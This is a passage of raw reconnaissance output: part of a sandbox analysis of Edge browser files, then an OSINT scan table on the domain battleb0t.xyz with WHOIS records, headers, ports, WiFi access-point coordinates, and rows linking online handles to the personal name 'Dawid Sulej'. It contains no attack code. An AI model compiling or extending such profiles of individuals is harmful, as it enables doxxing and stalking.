u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.110.153:443"'}, 
{u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00003280]\n "000003.log" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sync Data\\LevelDB\\000003.log]- [targetUID: 00000000-00003280]\n "load_statistics.db-wal" has type "SQLite Write-Ahead Log version 3007000"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\load_statistics.db-wal]- [targetUID: 00000000-00003280]\n "702d1a59af9078e8_0" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\702d1a59af9078e8_0]- [targetUID: 00000000-00003280]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003280]\n "shopping_iframe_driver.js" has type "ASCII text with very long lines with CRLF line terminators"- Location: [%TEMP%\\3280_676834451\\shopping_iframe_driver.js]- [targetUID: 00000000-00003280]\n "1327ba10-b1f0-4f07-a4d5-ec916f8b3b9a.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\1327ba10-b1f0-4f07-a4d5-ec916f8b3b9a.tmp]- [targetUID: 00000000-00003280]\n "manifest.fingerprint" has type "ASCII text with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.fingerprint]- [targetUID: 00000000-00003280]\n 
"settings.dat" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Crashpad\\settings.dat]- [targetUID: 00000000-00005824]\n "Part-ZH" has type "data"- Location: [%TEMP%\\3280_1262552392\\Part-ZH]- [targetUID: 00000000-00003280]\n "0af395f2-e575-4794-b38d-549209b43991.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\0af395f2-e575-4794-b38d-549209b43991.tmp]- [targetUID: 00000000-00003280]\n "Last Browser" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Last Browser]- [targetUID: 00000000-00003280]\n "8141af25-c36c-4d1c-b901-863b7ca6d582.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\8141af25-c36c-4d1c-b901-863b7ca6d582.tmp]- [targetUID: 00000000-00003280]\n "87110fb3-e1ef-4309-8cc5-8ec59a11e326.tmp" has type "UTF-8 Unicode text with very long lines with no line terminators"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\87110fb3-e1ef-4309-8cc5-8ec59a11e326.tmp]- [targetUID: 00000000-00003280]\n "manifest.json" has type "JSON data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\AutoLaunchProtocolsComponent\\1.0.0.8\\manifest.json]- [targetUID: 00000000-00003280]\n "temp-index" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Code Cache\\js\\index-dir\\temp-index]- [targetUID: 00000000-00003280]\n "crl-set" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\CertificateRevocation\\6498.2022.12.1\\crl-set]- [targetUID: 00000000-00003280]\n "Session_13320197892362944" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Sessions\\Session_13320197892362944]- [targetUID: 00000000-00003280]\n "adblock_snippet.js" has type "ASCII text with very long lines with no line terminators"- Location: [%TEMP%\\3280_1262552392\\adblock_snippet.js]- [targetUID: 
00000000-00003280]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://base32check.org/"\n Pattern match: "https://base32check.org"'}, {u'category': u'External Systems', u'origin': u'External System', u'identifier': u'avtest-1', u'name': u'Sample was identified as clean by Antivirus engines', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 12, u'description': u'0/88 Antivirus vendors marked sample as malicious (0% detection rate)'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-35', u'name': u'Drops script files inside temp directory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 5, u'threat_level': 1, u'type': 8, u'description': u'Dropped file: "shopping_iframe_driver.js" - Location: [%TEMP%\\3280_676834451\\shopping_iframe_driver.js]- [targetUID: 00000000-00003280]\n Dropped file: "adblock_snippet.js" - Location: [%TEMP%\\3280_1262552392\\adblock_snippet.js]- [targetUID: 00000000-00003280]\n Dropped file: "product_page.js" - Location: [%TEMP%\\3280_676834451\\product_page.js]- [targetUID: 00000000-00003280]\n Dropped file: "shoppingfre.js" - Location: [%TEMP%\\3280_676834451\\shoppingfre.js]- [targetUID: 00000000-00003280]\n Dropped file: "edge_confirmation_page_validator.js" - Location: [%TEMP%\\3280_676834451\\edge_confirmation_page_validator.js]- [targetUID: 00000000-00003280]\n Dropped file: "edge_checkout_page_validator.js" - Location: [%TEMP%\\3280_676834451\\edge_checkout_page_validator.js]- [targetUID: 00000000-00003280]\n Dropped file: "auto_open_controller.js" - 
Location: [%TEMP%\\3280_676834451\\auto_open_controller.js]- [targetUID: 00000000-00003280]\n Dropped file: "edge_tracking_page_validator.js" - Location: [%TEMP%\\3280_676834451\\edge_tracking_page_validator.js]- [targetUID: 00000000-00003280]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-1', u'name': u'Drops executable files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 1, u'type': 8, u'description': u'"widevinecdm.dll" has type "PE32+ executable (DLL) (console) x86-64 for MS Windows"- Location: [%PROGRAMFILES%\\(x86)\\Microsoft\\Edge\\Application\\103.0.1264.37\\WidevineCdm\\_platform_specific\\win_x64\\widevinecdm.dll]- [targetUID: 00000000-00003280]'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-43', u'name': u'Writes a PE file header to disc', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 1, u'type': 6, u'description': u'"msedge.exe" wrote 8192 bytes starting with PE header signature to file "%TEMP%\\3280_724529871\\_platform_specific\\win_x64\\widevinecdm.dll": 4d5a78000100000004000000000000000000000000000000400000000000000000000000000000000000000000000000000000000000000000000000780000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e2400005045000064ff0a00 ...'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-14', u'name': u'Found potential IP address in binary/memory', u'attck_id_wiki': None, u'threat_level_human': u'suspicious', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 1, u'type': 2, u'description': u'Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed 
Rules\\35\\10.34.0.41"\n Potential IP "10.34.0.41" found in string "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Unindexed Rules\\10.34.0.41\\LICENSE"'}], u'threat_level': 0, u'size': None, u'job_id': u'63e18140d18c55450952de88', u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': N | 185.199.110.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | ThermiCam2Production TRC (Net ID: 00:05:FE:C6:35:F1) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"Content_Length": ["151"], "_encoding": {"Content_Length": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8"}, "Server": ["cloudflare"], "Cf_Ray": ["7c5e6685bb0686ab-ORD"], "Connection": ["keep-alive"], "Content_Type": ["text/html"], "Date": ["<REDACTED>"]} | 188.114.96.1 |
| 2023-05-12 03:43:29 | Country | No | Country Name Extractor | 0 | 0 | 7 | 0 | None | Austria | Domain Name: INFLANY.COM
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: http://www.world4you.com
Updated Date: 2023-04-13T07:19:32Z
Creation Date: 2022-04-12T14:21:11Z
Registry Expiry Date: 2024-04-12T14:21:11Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email:
Registrar Abuse Contact Phone:
Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
Name Server: NS1.WORLD4YOU.AT
Name Server: NS2.WORLD4YOU.AT
DNSSEC: signedDelegation
DNSSEC DS Data: 36937 13 2 B736B70844AD09A9498F06982C97724A0BF4ACA8DE5244B40607B538A5323618
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of whois database: 2023-05-12T03:42:43Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
NOTICE: The expiration date displayed in this record is the date the
registrar's sponsorship of the domain name registration in the registry is
currently set to expire. This date does not necessarily reflect the expiration
date of the domain name registrant's agreement with the sponsoring
registrar. Users may consult the sponsoring registrar's Whois database to
view the registrar's reported date of expiration for this registration.
TERMS OF USE: You are not authorized to access or query our Whois
database through the use of electronic processes that are high-volume and
automated except as reasonably necessary to register domain names or
modify existing registrations; the Data in VeriSign Global Registry
Services' ("VeriSign") Whois database is provided by VeriSign for
information purposes only, and to assist persons in obtaining information
about or related to a domain name registration record. VeriSign does not
guarantee its accuracy. By submitting a Whois query, you agree to abide
by the following terms of use: You agree that you may use this Data only
for lawful purposes and that under no circumstances will you use this Data
to: (1) allow, enable, or otherwise support the transmission of mass
unsolicited, commercial advertising or solicitations via e-mail, telephone,
or facsimile; or (2) enable high volume, automated, electronic processes
that apply to VeriSign (or its computer systems). The compilation,
repackaging, dissemination or other use of this Data is expressly
prohibited without the prior written consent of VeriSign. You agree not to
use electronic processes that are automated and high-volume to access or
query the Whois database except as reasonably necessary to register
domain names or modify existing registrations. VeriSign reserves the right
to restrict your access to the Whois database in its sole discretion to ensure
operational stability. VeriSign may restrict or terminate your access to the
Whois database for failure to abide by these terms of use. VeriSign
reserves the right to modify these terms at any time.
The Registry database contains ONLY .COM, .NET, .EDU domains and
Registrars.
Domain Name: inflany.com
Registry Domain ID: 2688698192_DOMAIN_COM-VRSN
Registrar WHOIS Server: whois.world4you.com
Registrar URL: https://www.world4you.com
Updated Date: 2023-04-13T21:36:05Z
Creation Date: 2022-04-12T14:21:11Z
Registrar Registration Expiration Date: 2024-04-12T14:21:12Z
Registrar: World4You Internet Services GmbH
Registrar IANA ID: 1476
Registrar Abuse Contact Email: abuse@world4you.com
Registrar Abuse Contact Phone: +43.73293035
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID: REDACTED FOR PRIVACY
Registrant Name: REDACTED FOR PRIVACY
Registrant Organization:
Registrant Street: REDACTED FOR PRIVACY
Registrant City: REDACTED FOR PRIVACY
Registrant State/Province: AT
Registrant Postal Code: REDACTED FOR PRIVACY
Registrant Country: AT
Registrant Phone: REDACTED FOR PRIVACY
Registrant Phone Ext: REDACTED FOR PRIVACY
Registrant Fax: REDACTED FOR PRIVACY
Registrant Fax Ext: REDACTED FOR PRIVACY
Registrant Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Admin ID: REDACTED FOR PRIVACY
Admin Name: REDACTED FOR PRIVACY
Admin Organization: REDACTED FOR PRIVACY
Admin Street: REDACTED FOR PRIVACY
Admin City: REDACTED FOR PRIVACY
Admin State/Province: REDACTED FOR PRIVACY
Admin Postal Code: REDACTED FOR PRIVACY
Admin Country: REDACTED FOR PRIVACY
Admin Phone: REDACTED FOR PRIVACY
Admin Phone Ext: REDACTED FOR PRIVACY
Admin Fax: REDACTED FOR PRIVACY
Admin Fax Ext: REDACTED FOR PRIVACY
Admin Email: https://whoispro.domain-robot.org/whois/inflany.com
Registry Tech ID: REDACTED FOR PRIVACY
Tech Name: REDACTED FOR PRIVACY
Tech Organization: REDACTED FOR PRIVACY
Tech Street: REDACTED FOR PRIVACY
Tech City: REDACTED FOR PRIVACY
Tech State/Province: REDACTED FOR PRIVACY
Tech Postal Code: REDACTED FOR PRIVACY
Tech Country: REDACTED FOR PRIVACY
Tech Phone: REDACTED FOR PRIVACY
Tech Phone Ext: REDACTED FOR PRIVACY
Tech Fax: REDACTED FOR PRIVACY
Tech Fax Ext: REDACTED FOR PRIVACY
Tech Email: https://whoispro.domain-robot.org/whois/inflany.com
Name Server: ns1.world4you.at
Name Server: ns2.world4you.at
DNSSEC: signedDelegation
URL of the ICANN WHOIS Data Problem Reporting System: https://wdprs.internic.net/
>>> Last update of WHOIS database: 2023-05-12T03:42:54Z <<<
For more information on Whois status codes, please visit https://www.icann.org/epp
# World4You Internet Services GmbH WHOIS service.
#
# The data in the World4You WHOIS database is provided to you by
# World4You Internet Services GmbH for informational purposes only and
# may be used to assist persons in obtaining information about or
# related to a domain name registration record.
# Except for agreed Internet operational purposes (such as register or
# modify existing registrations), no part of this information may be
# stored, reproduced or transmitted by any means.
# World4You does not guarantee its accuracy.
#
# By submitting a WHOIS query, you agree that you will use this data
# only for lawful purposes and that, under no circumstances, you will
# use this data to
# (1) allow, enable, or otherwise support the transmission of mass
# unsolicited, commercial advertising or solicitations via E-mail
# (spam); or
# (2) enable high volume, automated, electronic processes that apply
# to World4You (or its computer systems).
# World4You reserves the right to modify these terms at any time.
# By submitting this query, you agree to abide by this policy.
# www.world4you.com - Your hostingprovider.at
|
| 2023-05-12 03:27:00 | Web Server | No | Web Server Identifier | 0 | 1 | 5 | 0 | None | Netlify | {"content-length": "243", "accept-ranges": "bytes", "strict-transport-security": "max-age=31536000", "server": "Netlify", "etag": "\"c575cbc28e14cae03836d1d0fc69c052-ssl\"", "cache-control": "public, max-age=0, must-revalidate", "date": "Fri, 12 May 2023 02:54:20 GMT", "x-nf-request-id": "01H06Y2YH7X6V06YSWWEW2NH9C", "content-type": "text/css; charset=UTF-8", "age": "0"} |
| 2023-05-12 03:23:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.13:443 | 188.114.96.0/24 |
| 2023-05-12 03:18:49 | Raw File Meta Data | No | File Metadata Extractor | 0 | 0 | 4 | 0 | None | {'Image Orientation': (0x0112) Short=Horizontal (normal) @ 18} | https://pics.battleb0t.xyz/images/withat_3.jpg |
| 2023-05-12 02:58:35 | Phone Number | No | Phone Number Extractor | 0 | 0 | 2 | 0 | None | +74955801111 | Domain Name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.ru
Registrar URL: https://www.reg.ru/
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registry Expiry Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of Domain Names REG.RU, LLC
Registrar IANA ID: 1606
Domain Status: ok https://icann.org/epp#ok
Registrant Organization: Privacy Protection
Registrant State/Province:
Registrant Country: RU
Registrant Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Admin Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Tech Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Name Server: DAPHNE.NS.CLOUDFLARE.COM
Name Server: SKIP.NS.CLOUDFLARE.COM
DNSSEC: unsigned
Billing Email: Please query the RDDS service of the Registrar of Record identified in this output for information on how to contact the Registrant, Admin, or Tech contact of the queried domain name.
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
>>> Last update of WHOIS database: 2023-05-12T02:44:05.0Z <<<
For more information on Whois status codes, please visit https://icann.org/epp
>>> IMPORTANT INFORMATION ABOUT THE DEPLOYMENT OF RDAP: please visit
https://www.centralnic.com/support/rdap <<<
The Whois and RDAP services are provided by CentralNic, and contain
information pertaining to Internet domain names registered by our
our customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) CentralNic Ltd (https://www.centralnic.com)
Access to the Whois and RDAP services is rate limited. For more
information, visit https://registrar-console.centralnic.com/pub/whois_guidance.
Domain name: BATTLEB0T.XYZ
Registry Domain ID: D333902916-CNIC
Registrar WHOIS Server: whois.reg.com
Registrar URL: https://www.reg.com
Registrar URL: https://www.reg.ru
Updated Date: 2023-01-15T21:30:02.0Z
Creation Date: 2022-11-17T08:43:43.0Z
Registrar Registration Expiration Date: 2023-11-17T23:59:59.0Z
Registrar: Registrar of domain names REG.RU LLC
Registrar IANA ID: 1606
Registrar Abuse Contact Email: abuse@reg.ru
Registrar Abuse Contact Phone: +7.4955801111
Status: ok http://www.icann.org/epp#ok
Registrant ID: yhn6mof3dqy-sdhe
Registrant Name: Protection of Private Person
Registrant Street: PO box 87, REG.RU Protection Service
Registrant City: Moscow
Registrant State/Province:
Registrant Postal Code: 123007
Registrant Country: RU
Registrant Phone: +7.4955801111
Registrant Phone Ext:
Registrant Fax: +7.4955801111
Registrant Fax Ext:
Registrant Email: BATTLEB0T.XYZ@regprivate.ru
Admin ID: mhrgfickoq3r30s0
Admin Name: Protection of Private Person
Admin Street: PO box 87, REG.RU Protection Service
Admin City: Moscow
Admin State/Province:
Admin Postal Code: 123007
Admin Country: RU
Admin Phone: +7.4955801111
Admin Phone Ext:
Admin Fax: +7.4955801111
Admin Fax Ext:
Admin Email: BATTLEB0T.XYZ@regprivate.ru
Tech ID: yyj-fcbflruqmlro
Tech Name: Protection of Private Person
Tech Street: PO box 87, REG.RU Protection Service
Tech City: Moscow
Tech State/Province:
Tech Postal Code: 123007
Tech Country: RU
Tech Phone: +7.4955801111
Tech Phone Ext:
Tech Fax: +7.4955801111
Tech Fax Ext:
Tech Email: BATTLEB0T.XYZ@regprivate.ru
Name Server: daphne.ns.cloudflare.com
Name Server: skip.ns.cloudflare.com
DNSSEC: Unsigned
URL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/
>>> Last update of WHOIS database: 2023.05.12T05:44:06Z <<<
For more information on Whois status codes, please visit
https://www.icann.org/resources/pages/epp-status-codes-2014-06-16-en.
TERMS OF USE: The Whois and RDAP services are provided by REG.RU, and contain
information pertaining to Internet domain names registered by our
customers. By using this service you are agreeing (1) not to use any
information presented here for any purpose other than determining
ownership of domain names, (2) not to store or reproduce this data in
any way, (3) not to use any high-volume, automated, electronic processes
to obtain data from this service. Abuse of this service is monitored and
actions in contravention of these terms will result in being permanently
blacklisted. All data is (c) Registrar of Domain Names REG.RU LLC (https://www.reg.com)
|
| 2023-05-12 03:36:07 | Open UDP Port | No | Tool - nbtscan | 1 | 0 | 3 | 0 | None | 45.131.109.53:137 | 45.131.109.53 |
| 2023-05-12 02:49:41 | Malicious IP Address | Yes | VirusTotal | 0 | 1 | 2 | 0 | None | VirusTotal [185.199.111.153]
https://www.virustotal.com/en/ip-address/185.199.111.153/information/ | 185.199.111.153 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | x-github-request-id: F620:0A4B:1087FED:17E0EF4:645DA7F4 | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-lga21959-LGA", "x-cache": "HIT", "x-github-request-id": "F620:0A4B:1087FED:17E0EF4:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "88b13ec8ddf02c1379830d22f861ddb1826456ec", "date": "Fri, 12 May 2023 02:54:15 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "562", "x-timer": "S1683860056.740489,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} |
| 2023-05-12 02:57:21 | Internet Name | No | Certificate Transparency | 2 | 0 | 1 | 0 | None | panel.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:16:25 | Username | No | Account Finder | 6 | 0 | 1 | 0 | None | dawidsulej | Dawid Sulej |
| 2023-05-12 03:00:48 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.65): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:55:01 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5bed4978fe2c9b-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.96.1 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 1 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/carti_2.PNG | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:01:06 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.115): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | USR9108 (Net ID: 00:14:C1:10:CB:2C) | 40.2024, 29.0398 |
| 2023-05-12 02:55:11 | Open TCP Port | No | Censys | 0 | 0 | 2 | 0 | None | 87.248.157.102:995 | 87.248.157.102 |
| 2023-05-12 02:54:18 | Linked URL - Internal | No | Web Spider | 2 | 0 | 3 | 0 | None | https://pics.battleb0t.xyz/images/random_3.jpg | https://pics.battleb0t.xyz/ |
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | The Batcave (Net ID: 00:11:32:7C:A3:89) | 50.8897, 6.0563 |
| 2023-05-12 02:52:54 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | | 185.199.108.153 |
| 2023-05-12 02:44:21 | SSL Certificate - Raw Data | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:4d:72:d7:7c:dd:a7:02:dd:5a:67:f2:a2:3b:bd:d9
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=DigiCert Inc, CN=DigiCert TLS RSA SHA256 2020 CA1
Validity
Not Before: Feb 21 00:00:00 2023 GMT
Not After : Mar 20 23:59:59 2024 GMT
Subject: C=US, ST=California, L=San Francisco, O=GitHub, Inc., CN=*.github.io
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Authority Key Identifier:
keyid:B7:6B:A2:EA:A8:AA:84:8C:79:EA:B4:DA:0F:98:B2:C5:95:76:B9:F4
X509v3 Subject Key Identifier:
8D:02:1C:75:5A:CD:C6:A6:41:78:69:28:C3:F7:AA:A7:98:3B:D5:BB
X509v3 Subject Alternative Name:
DNS:*.github.io, DNS:github.io, DNS:*.github.com, DNS:github.com, DNS:www.github.com, DNS:*.githubusercontent.com, DNS:githubusercontent.com
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 CRL Distribution Points:
Full Name:
URI:http://crl3.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
Full Name:
URI:http://crl4.digicert.com/DigiCertTLSRSASHA2562020CA1-4.crl
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.2
CPS: http://www.digicert.com/CPS
Authority Information Access:
OCSP - URI:http://ocsp.digicert.com
CA Issuers - URI:http://cacerts.digicert.com/DigiCertTLSRSASHA2562020CA1-1.crt
X509v3 Basic Constraints:
CA:FALSE
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 76:FF:88:3F:0A:B6:FB:95:51:C2:61:CC:F5:87:BA:34:
B4:A4:CD:BB:29:DC:68:42:0A:9F:E6:67:4C:5A:3A:74
Timestamp : Feb 21 15:03:41.179 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 73:D9:9E:89:1B:4C:96:78:A0:20:7D:47:9D:E6:B2:C6:
1C:D0:51:5E:71:19:2A:8C:6B:80:10:7A:C1:77:72:B5
Timestamp : Feb 21 15:03:41.162 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 48:B0:E3:6B:DA:A6:47:34:0F:E5:6A:02:FA:9D:30:EB:
1C:52:01:CB:56:DD:2C:81:D9:BB:BF:AB:39:D8:84:73
Timestamp : Feb 21 15:03:41.130 2023 GMT
Extensions: none
Signature : ecdsa-with-SHA256
Signature Algorithm: sha256WithRSAEncryption
| 185.199.108.153 |
| 2023-05-12 03:19:01 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Altan (Net ID: 00:12:BF:67:61:97) | 40.2024, 29.0398 |
| 2023-05-12 02:44:03 | Username | No | SpiderFoot UI | 0 | 0 | 0 | 0 | None | DawixSulej | "Battleb0t","Kekwltd","Patrick Pogoda","DawixSulej","Dawid Sulej","ayshoo",battleb0t.xyz,"_BattleB0t_",ayhu.xyz |
| 2023-05-12 03:08:48 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 104.196.30.227 | 104.196.30.220 |
| 2023-05-12 03:18:06 | URL (Uses Javascript) | No | Page Information | 0 | 0 | 3 | 0 | None | http://funny.battleb0t.xyz | <!DOCTYPE html>
<html>
<head>
<title>Funny Forehead Gallery</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<script src="http://code.jquery.com/jquery-3.2.1.js" integrity="sha256-DZAnKJ/6XZ9si04Hgrsxu/8s717jcIzLy3oi35EouyE=" crossorigin="anonymous"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script src="https://use.fontawesome.com/9dfc16ed6b.js"></script>
<link rel="stylesheet" type="text/css" href="gallery.css">
<link rel="icon" type="image/png" href="/images/favicon.png">
</head>
<body>
<nav class = "nav navbar-inverse navbar-fixed-top">
<div class = "container">
<div class = "navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#bs-example-navbar-collapse-1" aria-expanded="false">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a href = "#" class = "navbar-brand"><span class="glyphicon glyphicon-picture" aria-hidden="true"></span> #WieselOnTop</a>
</div>
</nav>
<div class = "container">
<div class = "jumbotron">
<h1><i class="fa fa-camera-retro" aria-hidden="true"></i> The Funny Forehead Gallery</h1>
<p>A bunch of beautiful images!</p>
